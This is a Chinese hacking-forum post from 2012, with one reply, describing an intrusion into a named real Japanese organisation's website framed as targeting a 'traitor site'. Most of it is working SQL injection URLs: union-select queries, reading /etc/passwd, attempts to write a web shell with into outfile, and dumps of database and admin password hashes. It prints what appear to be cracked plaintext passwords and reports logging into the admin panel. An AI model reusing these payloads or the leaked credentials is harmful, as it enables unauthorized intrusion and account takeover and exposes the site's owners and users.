找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3418|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
6 ^7 T9 x# M) Q# H, A6 c  v5 L
6 a" U% d% c" o( @
0x01. 检测 www.zuaa.jp 收集数据3 n3 e) S7 u6 S" c( G- u
; ?0 g- y+ A3 q8 B  U

+ W5 i) {1 h' o3 `+ Gwhatweb' O" P5 O% O- ]1 U  B
& B) ~, @# n+ u' @# w% g3 ^

/ M5 A7 U' _" ^4 m$ c. m利用NMAP扫描  k, I7 E0 W# F$ |9 C9 }" Z

: w, G$ ?% V5 e/ v7 O2 y) Z. U中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  G" m% Z3 s$ O, K0 O0 D: }8 D4 [& \0x02.找注入点
) I9 s8 ^( |; o找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
2 @0 f; [  V/ ^. @2 n0 U! Z, e8 V& }  L0 z0 _& i& j* j

' E- A: p" @. q" {2 l' x* E0x03.order by. @4 J' g9 P, V9 s+ y6 a7 c
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1) c/ E( c0 r: H
. a' Z* t7 b0 X; I4 P4 V- J) r
order by 28报错,order by 27正常2 @( b( Z2 N4 u" r

& u1 Z+ H& L: H, X1 w0x04.   union手动查询
& X$ l4 b# R' S" i) ^http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 2 T1 n+ n& n+ l* P1 b
添加到 27 时正常显示
1 O, Y$ ~+ S8 z' ]( M2 x6 t7 D( b0 ]' R8 {4 d
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
7 _# n7 b: j* N3 G& F8 O
2 U6 v, G3 L4 u3 F5 C% `0x05. info:% B8 Q, @: P8 }5 X4 F4 S
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ' B& m9 K  j' \# |0 v# K! l
0 z; Y5 S6 y$ G; ?1 J, h2 I3 X
user:            root@localhost  c: W0 Z% ]3 }4 Z8 {1 U$ v
database:    openpne
. W; L1 L* i( q% G: i7 T" }3 oversion:      4.1.22( i# ~! {  o& \. a8 D- ]- L% @
os:             portbld-freebsd5.4
  H0 g% ]. a* U4 ?5 o1 H$ p1 a8 \0 z# R% ?8 G, {+ D) ]5 Z
0x06. root用户5 l5 o" U6 e& D+ S
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)9 b' E* Q" b5 _) I
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ( F- q/ u' B- C( k  ~$ p

$ `0 ^$ H! s; M) V+ Z; I. M通过工具转换: s3 T. p% K$ d3 v
; W: J& A( v3 q/ P. ^" w3 b
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 s- t2 Y& @* B" n7 i

; X+ P% W1 i" t% D9 {" b7 n0 L0x07. 利用 into outfile6 I5 ?+ T, O3 _/ C
全部都失败
$ G+ D, U  N/ E4 Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
$ W1 k/ \% _& R. ]
2 f' ~8 C" w) h2 ?' K# bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
( p  ]& @( C8 ?. b1 |  Y, X9 ~2 Y2 e% Y; e% o! Q# s1 ?' o
页面显示“MDB2 Error:syntax error”
$ [  U, `$ M  e: W4 V$ s4 `( p. |+ N2 v
0x08. 利用 mysql 4.1
/ g! @3 P  J2 `猜常规表名,字段未果 工具 sqlmap( t4 a- v3 H% B: a) e  H- O
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持" K. D$ @6 ~* U! i/ {7 z- G

0 C  N' p% ?* E5 [
0 G: Q7 r7 {2 q3 A% @  A0 k& ^& K( S
0x09. 查找后台5 B  x( F! e6 H: g( o8 t1 e% I+ R
利用 现有的各种 后台工具尝试都不行
& t% T$ ?/ L3 D$ J, C: U* ^3 B  }/ T5 m) A+ f
0x10.  MySL外联方法
) \8 [5 w; m# k9 l从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
! B& y- g" l' X& Y" Z) @可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
  B& [) X+ c3 q" X  Y. |http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user& L4 R" c2 D  g. ~' P
& {2 h: t: j* H  E
这个可以在 www.cmd5.com 解密$ E! E' f8 @% S% ]3 m1 p  g# u
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
- v" j/ J$ R0 p, o( r9 L! x: qchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97( @$ w/ @9 v3 F" X+ w
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
% e' U+ k5 i- R' ?. }$ ?$ c/ O, mzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???% q/ y& e* m6 M% |3 Q9 a; t- u6 P
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知. A/ [% D6 z  P
& G1 D/ N% O3 b

0 Y1 X6 N# ^. ]& w0x11. 网站突破
6 r5 K# A3 H* E8 z6 O) n$ x; s2 V发现网站的源程序 openpne, google 下载 openpne 源码3 \8 E% \4 B% f; {& g
0 ]1 a3 s3 h: P1 J
' A/ M% E# l8 {& L7 H3 s& q
0x12. 默认信息利用
5 j$ I" H; t; ^7 V( K+ S3 ^5 Ohttp://sns.zuaa.jp/?m=admin&a=page_login
2 d* d$ O' H4 R! _9 C$ b3 t9 O$ M$ t9 P# ?
表名 (c_admin_user) ,字段名(username,password)
6 h  d" f0 u7 G+ y$ K- \- E& whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
- c; f9 S$ x; ~/ ^
- S- |" _, n8 s/ t解密$ H9 R0 A7 S: R# w. u
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20095 Y7 W+ w4 M. U9 s5 W6 `: e
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
; O1 i4 b# R1 N' |
) ~; ]) V/ F' Z, }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ N0 ^$ o" G1 y$ F& ]1 \& Q3 v- V/ O3 ]& Q
0x13. 登录后台
% V# J: v+ ^8 d- N
( w6 {0 F/ ?, d6 I0 t
" C4 D. f8 q6 F3 c
/ t3 W/ p  Z) N  }! g0x14. 小结
* a, ^  n) d7 r4 r& Z利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。0 w9 Y3 B! W- U$ e9 i, z; M
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
3 \2 V3 f2 \, q, p* H, w# j# b6 b------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
/ n: ~/ _4 G. ?8 }  ?6 X! l( R: @中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& V& o) T; Z, b8 S' r
, w6 p' X% }6 @" I( J7 Q7 @; w* B4 V
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!6 z3 d, o2 x: U6 c0 [

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表